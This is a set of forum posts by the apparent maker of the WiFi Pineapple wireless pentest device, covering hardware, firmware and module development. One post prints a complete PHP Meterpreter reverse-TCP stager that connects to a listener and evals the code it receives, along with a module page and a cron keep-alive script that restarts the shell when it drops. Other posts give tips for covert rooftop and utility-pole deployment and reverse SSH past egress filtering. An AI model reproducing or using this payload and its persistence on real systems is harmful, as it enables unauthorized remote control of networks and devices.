Darren Kitchen

Sorry about that! We'll look into some caching services. It shouldn't be under heavy load.

Usb seems like the way to go.

Powering the pineapple from the USB port isn't officially supported. DC port all the way.

I would be interested in seeing what Kismet has to say about this.

I can't begin to express how happy I am with the latest developments. From where we were a year ago to now is astounding, and this module is a catalyst for even greater things to come. Mad props to Sebastian!

From the modules page you can pin modules to the navigation bar. We understand that some features may not be as intuitive as they need to be so as we nail down technical features we will focus on usability. Thanks!

As telot has pointed out the internal wifi can go into monitor mode. The single USB port can be used for storage (just format a drive in EXT4 and it shows up as /usb/) Rather than tcpdump, which would only gather packets from connected clients, you'd probably want to use airodump-ng. I see you're looking for something passive that just records what's in the air. I believe the command would be airodump-ng -w /usb/capture.pcap or something to that effect. In this configuration you would only require the pineapple, a usb drive and a battery pack. The hakshop has all of these and we're able to put together something custom if you require -- wifipineapple.com/contact

Brilliant! I could really see this being useful as a "find my pineapple" feature.... You know, for when you can't remember where you left it. Or accidentally magnetically attached it to the seat in front of you on the bus... I'm so silly that way. Thirded! The pineapple is absolutely a multipurpose pentesting platform. I'm pretty sure gpsd is already supported in openwrt and there are likely some generic usb gps dongles that'll work. Might need a kernel module, but hey if this works we could always roll it into the firmware. GPS Hardware aside even the WiFi location service would be nifty as hell. In fact, Google offers an API for its WiFi location service: http://googlecode.blogspot.com/2008/10/introducing-gears-geolocation-api-for.html (or use Wiggle) 3.3v TTL. The headers on the board should work no problem. I believe it's /dev/tty0 or something similar. Haven't had a need to connect a serial device but there's no reason boards couldn't be added to the pineapple this way.

Moreover, was the pineapple working and then stopped, or had you always received a "page not found" error? Had it always blinked constantly, or is this new behavior?

Just throwing this out there for anyone else with a similar problem. Since around firmware 2.0.0 the reset button on the bottom of the pineapple will reset the root password to the default "pineapplesareyummy" Boot the pineapple as usual. Wait for the WPS light to stop blinking. Then another minute after that just for good measure. Then hold the reset button (located on the bottom of the unit) for 10 seconds. Wait another minute and reboot the pineapple. Everything should be right as red.

Yep, that's the idea. Have a static relay service in the cloud where by your pineapple and roaming laptop can meet and be friends. I'd love to hear more about your adventures in dropbox land. It's one of the features I've been meaning to give greater attention. I don't have a unit in front of me but I believe the WAN port will get an address from DHCP, thereby getting you on most networks. Unfortunately I cannot confirm that the reverse SSH connection back to home base is made only through the 3G interface. It would seem so as long as the network plugged into the WAN port doesn't become the default gateway, but again I haven't checked. Would want to make sure since the organization you're pen-testing is likely running some sort of IDS or egress filtering and SSH traffic triggers red lights. Will play around more with this as I finish the first edition of the pineapple book and focus on actual workflows for the next one. Please report back! Cheers :)

Odd, should work. What about manually configuring the network. Try "sudo ifconfig eth0 172.16.42.42 netmask 255.255.255.0 up; ping 172.16.42.1" Also you may want to disable any network managers that might be messing with your connection. The network-manager service typically found in Gnome can sometimes get in the way. Not sure about arch but on ubuntu it's "stop network-manager". Lastly, I did recently update the wp4.sh script to include some pretty ascii art and clean up the wizard a bit. I don't recall messing with the heavy lifting code but just in case here's a link to the old version. Let me know if this solves your problem as I haven't experienced trouble with the new one. http://www.wifipineapple.com/wp4-1.0.sh

I've seen a few modules that are "killer apps". This one, the black lister, jammer, site survey... But rather then roll everything in I like how, black lister for example, expands on existing functionality. I think in the next major release modules will be more prominent in the UI, the next obvious step from simply being able to pin 'em to the main nav bar. Think a dedicated module bar under the main nav. Just thinking out loud. This is all very exciting. The project is so much bigger than the sum of its parts are you guys are all to thank.

Those goal zero kits look nice. Like I said, adventurer stuff is hella pricey. Also the MR3020s are a lot of fun, aren't they? Sensor info might be possible on the MK4 actually -- there's a serial port on there that (afaik) has yet to have been hacked :)

Whistle Master, you never cease to amaze me. Kudos on the latest module!

lead acid is the way to go when it comes to solar. I too have looked into these USB solar packs and come to the same conclusion with each offering I see -- either lame gimick that could maybe trickle charge an iphone, or hella expensive aimed at adventurer backpackers and the like. I prefer a more simple off the shelf inexpensive tried and true approach. So far so good.

*nod*

I figured I'd give a sneak preview at a new WiFi Pineapple project. We're still in testing phases but so far have the makings of a solar powered pineapple. The goal is to build a full on fruit farm using only power from the sun. These will be great for large scale unmanned covert roof-top deployments. Today is a great day for testing. After a week of non-stop usage we've had our first major foggy / cloudy day. I have high hopes for this setup, which is actually our second attempt. Now with a 3x larger panel, if the math works out this should go on for the foreseeable future (nuclear winter non-withstanding). Should have a proper rig, much slimmer and robust than the above photo, ready by end of summer in the form of an inexpensive add-on or kit along with some power saving firmware additions. Feedback and questions absolutely welcome.

The Mark IV hardware is quite formidable. Here's a screenshot taken from my phone while at a target rich environment. I couldn't zoom out enough to capture all of the clients but over the course of 4 hours I completely filled the subnet. 250+ clients on our little fruity friend. Mind you this is from 1.0.0 beta! Now I can't go into much detail, but an enterprise version is already in the works with "immense firepower" so, stay tuned.

Think Red Hat Enterprise vs centos.

So I've been working on a meterpreter module and it's 6:00 here so I figured I'd post my work-in-progress. Here's a screenshot of it in action using armitage / cobalt strike (front-end for metasploit): And here's a pic of the module WIP: It's based off the PHP Meterpreter. To test it launch msf console and use the php/meterpreter_reverse_tcp payload. Or from BT5 R2 start Armitage, hit Yes to start MSF and give it a minute, then from the tree in the top left double-click payload > php > meterpreter_reverse_tcp - set your IP and Port and launch. Then on the pineapple from a shell issue "php tt.php" ensuring that the first few lines of tt.php reference said IP and port. Here's the php meterpreter: <?php error_reporting(0); # The payload handler overwrites this with the correct LHOST before sending # it to the victim. $ip = '172.16.42.42'; $port = 4445; $ipf = AF_INET; if (FALSE !== strpos($ip, ":")) { # ipv6 requires brackets around the address $ip = "[". $ip ."]"; $ipf = AF_INET6; } if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f($ipf, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { # We failed on the main socket. There's no way to continue, so # bail die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($B) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($B)); break; case 'socket': $b .= socket_read($s, $len-strlen($B)); break; } } # Set up the socket for the main stage to use. $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($B); die(); ?> Just change IP and Port above to what you're using. The biggest problem I've had with the module so far is getting it to fork properly. I've tried using "| at now" and even empty (not the greatest since it has a timeout). Even went as far as writing a meterpreter-keepalive.sh which would run by cron every minute. Here's the code: meterpreter.php <?php if(isset($_GET['start'])) { echo "<pre>Starting Meterpreter</pre>"; exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh"); // if (exec("ps aux | grep \"[s]tart-meterpreter.sh\"") == "") { // exec("empty -f -i /tmp/meterpreter.in -o /tmp/meterpreter.out -p /tmp/meterpreter.pid -L /tmp/meterpreter.log /www/pineapple/modules/meterpreter/start-meterpreter.sh"); // } else { // echo "<pre><b>Meterpreter already running</b></pre>"; // } } $filename = $_POST['filename']; $newdata = $_POST['newdata']; if ($newdata != "") { $newdata = ereg_replace(13, "", $newdata); $fw = fopen($filename, 'w') or die('Could not open file!'); $fb = fwrite($fw,stripslashes($newdata)) or die('Could not write to file'); fclose($fw); $fileMessage = "Updated " . $filename . "<br /><br />"; } ?> <html> <head> <title>Pineapple Control Center</title> <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE"> <link rel="stylesheet" type="text/css" href="/pineapple/includes/styles.css" /> <link rel="icon" href="/pineapple/favicon.ico" type="image/x-icon"> <link rel="shortcut icon" href="/pineapple/favicon.ico" type="image/x-icon"> </head> <body> <?php include_once("/www/pineapple/includes/navbar.php"); ?> <br><br> <center> <table width="50%"> <tr><td> <div class=news> <div class=moduleTitle><b>Configuration</b></div> <div class=moduleContent> Edit IP address and Port below to match that of your metasploit session. <?php $filename = "/www/pineapple/modules/meterpreter/tt.php"; $fh = fopen($filename, "r") or die("Could not open file!"); $data = fread($fh, filesize($filename)) or die("Could not read file!"); fclose($fh); echo "<form action='$_SERVER[php_self]' method= 'post' > <textarea name='newdata' rows='20' style='min-width:100%; background-color:black; color:white; border-style:dashed;'>$data</textarea> <input type='hidden' name='filename' value='/www/pineapple/modules/meterpreter/tt.php'> <br><center><input type='submit' value='Update Meterpreter Script'> </form>"; ?> </div> <br> <div class=moduleTitle>Meterpreter Configuration</div> <div class=moduleContent> This keep alive script will restart the Meterpreter session if it drops connection. </div> </td></tr></table></center> </body> </html> meterpreter-keepalive.sh #!/bin/sh # ------------------------------------------------- # Simple keep alive script for meterpreter sessions # ------------------------------------------------- logger "Meterpreter: Keep-Alive Script Executed" if ! ( pidof php tt.php); then php /www/pineapple/modules/meterpreter/tt.php & logger "Meterpreter: Connection was down, restarted." else logger "Meterpreter: Connection seems to be up." fi My code is rusty having taken a month or so off so I figured I'd post my work in progress. If started from a shell it works great. Just trying to pretty it up / packing it up. Lemme know what you think. I'm going to go look at the sky or something having nothing to do with computers for a few hours. Sure it'll come to me then...

This was linked to me on twitter so I thought I'd share. http://www.dragonjar.org/ocultando-la-pina-wifi-en-un-viejo-libro.xhtml The blog post isn't in English, but pictures are work a thousand words.

From the Advanced menu, what does your route configuration look like? It should be to the device usb0. Will test soon.

I ran a Mark IV back in the 1.0.0 days at an *** party, nearly filling the 255.255.255.0 subnet, for about 4 hours housed inside a pelican case. The unit didn't even get warm! I've tested every Pelican Micro kit available. The 1010 is great if you're a into modding a looking for something small. Sadly it doesn't fit much more than the PCB and our Pineapple Juice 3200 battery. 3G and WiFi antenna are outboard. The 1040 will house a pineapple, battery, antenna and perhaps a 3G dongle if stripped down. It's a good footprint but takes some finagling. The 1050 is best in my opinion. Similar footprint to the 1040 but with a deeper inside. It easily houses a pineapple and all essential accoutrements including battery pack, 3g dongle, usb hub and awus036nha and both antennas without modding. We actually have these cases on order now (just finished up the paperwork to become an authorized pelican distributor) and will have an uber elite package ready in time for DEFCON. That said I've had similar success with otter boxes and the like. There are also plenty of good hobby boxes at Fry's or Radio Shack. I wired a on/off switch to one and applied several neodymium magnets for easy attachment to telephone poles and utility boxes. With a little spray paint you've got instant urban camouflage.

I was about to say, we should add a localization mechanism and bring these guys into the fold, rather than fork. I mean, it's open source do what you will but we'll all benefit if additional modules are being developed for all languages. Sign me up for the Klingon.lang ;)